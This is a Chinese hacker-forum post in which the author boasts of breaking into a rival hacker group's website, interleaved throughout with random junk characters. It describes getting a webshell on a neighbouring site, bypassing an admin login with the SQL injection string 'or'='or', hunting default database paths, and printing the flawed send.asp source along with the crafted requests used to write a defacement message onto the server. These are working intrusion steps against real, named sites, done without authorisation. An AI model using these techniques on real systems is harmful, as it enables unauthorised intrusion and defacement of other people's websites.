|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
6 G+ L) ~+ F0 b$ q2 M+ G, ?8 w今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
~7 ?" \3 @$ C$ M$ M8 v: N这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来1 D' v* Y( d/ Z! |* V3 F) E9 F
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东( X1 g* i* A& N( G, m3 }, k4 q4 u# [ }
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
2 C7 x" \- @% N+ G, h) g服务器应该防ARP,不过这还只是猜测- Y* x( w' f2 d& t1 J' X
云中鸡说先不搞C段,PZ一下再说
f4 \4 U* n8 p# n W6 w: B( }然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
0 R. q& r" B9 k9 ^* p) a: [* N一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............: @! Z+ e7 D: Q4 U
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell; c) M# Y9 w5 r4 I
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
" p4 p ^: m' W. _4 d P- z0 p5 i然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
+ u, a* D/ Y. G2 }: n看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
( Q) s5 D; @; E% \/ |( E1 ]问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............4 q- V" _) y m; W; a
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~' }7 {/ b( l E, @) Q. M
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么9 Y1 t- h" z2 ]: A5 v6 T
打开一看,如图1所示。5 R2 ?0 u9 `2 I$ o
# v& b" f* h( @) S4 {+ _, Y
http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg
6 v* f" v" M7 |4 r; i我靠~~这啥东西?这么帅?点进去一看,如图2所示。% o! U5 b, P7 c7 I6 l9 o) `5 d
! V5 O6 e5 c. M- R+ H- n9 t# ^/ K
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
1 X2 A4 _! M/ o太帅了,真YD!!; Z* `4 Q, L" p
这个页面应该是一套个人主页程序,而且还挺炫的!
$ K0 m9 W+ v2 l# K. Y这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
* d! _) z$ S" H
* d* l. u* q" P2 ]2 S; Z http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
4 u; B: o- d5 L+ r8 o嘿嘿,试着'or'='or'居然进去了!!如图4所示。 E# u2 m o% I
8 _/ \" w- I$ c$ `% E+ z) X http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
v& [. f+ U# [经过半个多小时的摸索,还是没有发现可利用的地方。' W& E9 J7 ]% J4 k1 E! B3 K
这下郁闷了,不管了,把这套程序下载下来看看吧 `- O: K+ M$ h7 i* s
找了一会才知道这套程序叫做“V时代个人flash主页”* k, ]0 v* v( f3 [
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
, I! P* a+ v; z% J# b/ l于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]- a% x, r& v8 n
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]; I* r" e* x8 `2 y- p
同样是找不到页面,真晕!再看看!
9 v& X! b: x; Z! t; a# o5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
1 F9 P! c( c6 t3 q8 g马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
6 L: A7 @1 _5 w; E$ i) i$ L2 l/ u打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!
# Q r7 k* P3 }* d8 }) W. ~9 @希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:* H* ^+ V9 U8 M& `& W' w2 `
, q! B! m2 A" \- h# _" A5 F: P! w5 }var a
- [/ x6 J$ r+ J) d& C- Fvar b
: T' P6 S$ O5 j% Mvar tx' I; V# ^9 O8 b( }
var clean
# R4 t" r& c) G7 {0 |9 v( s3 q9 ja=Request("re")
# @ S5 d; j% E3 Iclean=Request("clean")" r2 D& C, `+ U$ w& b2 M
var jian="test.txt"
! u v+ V$ i0 H1 [1 }
. h5 k8 l6 ?& q7 d: I) ^% hif(clean==1){
6 L7 @! d( V' }6 T8 ?. T' v6 Ztx="&a="
8 L1 y# m& x+ f) p2 wvar fs2. W( N0 l, N% R# ?9 C
var fs2=Server.CreateObject("Scripting.FileSystemObject")
# Z0 ?, u' n( evar newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)! l& y7 ?; E5 H, r% `5 }% r1 S
newdt.WriteLine("&a=")
2 l T% J* Q$ u) h$ U' Nnewdt.close()$ W2 C7 \. [, Q4 _
}# O0 v. F. y$ U
! B; h* [- A8 U" }/ ~
if(clean==0|clean==1){
( \/ u: g O6 l# w+ G1 b `8 C }tx=""
% ^; u! L( y F: J# r# ~ fvar fso = Server.Createobject("Scripting.FileSystemObject")2 Q. k( T3 ?, D) n0 ?
var file = fso.OpenTextFile(Server.Mappath(jian))
# B( |# N# g: \9 u' zwhile (!file.AtEndOfStream){4 |& G; e! x9 n3 A
tx=file.ReadLine()
/ d5 k9 J( s$ z2 t1 NResponse.write (tx)* Z+ b0 B0 ?/ u7 t4 F8 b
}% l; r1 a7 Y0 S! ]/ @
Response.write ("&")
' _* _# r; ~0 i8 H1 Ofile.close()
7 J. ]% m, N+ W) V5 b! b+ T3 Q}# l. C5 x1 n1 U( y: M. ^
3 V" k$ U7 O- W7 g: e
if(clean==2){
+ _" i, I+ ?# B3 Utx=""
- f' Z- l) `. `& K3 q' Fvar fso = Server.Createobject("Scripting.FileSystemObject")
7 T: I* p8 w8 D" bvar file = fso.OpenTextFile(Server.Mappath(jian)); j; B* B. _' H+ X$ c8 |% H5 ?
, a: M9 X! i) {! g8 ~
var fs2
8 V/ ], g/ u: a* H5 j1 g) ]var fs2=Server.CreateObject("Scripting.FileSystemObject")
2 \0 [ I5 [# m) E% Ivar newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true): L$ i; T! P7 x1 ?2 Y) z
9 g+ Z- ], v9 X0 @1 k0 a& i. e! _
: e4 m- Q# ^, F$ I/ Dwhile (!file.AtEndOfStream){/ W4 M" B9 Y; h' M4 T% M9 g
tx=file.ReadLine()6 e6 u7 z; _( G
Response.write (tx)}7 i+ `) J6 E1 u3 p, |* G/ I& [9 p
2 D. Z, c) g5 u& Q! v
Response.write (a+"&")
6 h* ^% d3 i& ~! |3 B4 qnewdt.WriteLine(a)
9 Z6 D" H. c+ g, e/ g- U7 ]. F, ?- r; R( G5 A0 [5 m
file.close()
0 ?+ ~3 ]9 E. y+ rnewdt.close() ?. s. v" E& Y
}
+ m K( {; X8 e& ]% t- `7 A) U1 v# a) F8 v
$ S# E1 X. K% B: s4 a- i T: M复制代码 T& ?7 r6 p3 h/ l
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”8 g/ u2 D R. t& k
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”- [& {. M' r# I+ V" r* `
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话6 ^) a6 I- B7 ]8 J1 h* W' g
过程如图5、6所示。
) b# b$ j, t4 ~; [$ }
5 |" [: m9 h: ]- u( K O+ Jhttp://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg' W3 q# o% J- H0 y
6 }3 T0 J' ~+ N& d3 s0 e http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg9 ?1 r2 B# q4 v. {
提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
% F/ M- Z& z3 _. z0 _- Q6 I) X& u
- R5 k( P4 X% F* y http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg3 @- O' p O) Y9 A5 h: ^" |3 Y
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
# w# I! x$ a, d6 ^+ K7 S如果jian是经过request取值的话,同样也能搞到shell。
9 x8 b% Z( t- _+ k+ O# r: F* X5 @这次只是装到了X,并没有拿到shell
+ D# h/ P" o9 b, Q/ ^已经是凌晨了,跟云中J说了声就睡觉去鸟
& |6 D: l" _. ^% W4 }估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
9 R: i3 {4 d2 i就到这里吧,没技术含量,纯粹装X,高手们见笑了
) d9 @8 g; u y另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己- F: o: L! g6 y6 b
自己学不到技术,却还在自欺欺人6 Q. l" q+ n1 F) i9 m
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
% e0 ~" r1 W9 E A# d: f# X- e( V! u% w7 E
|
|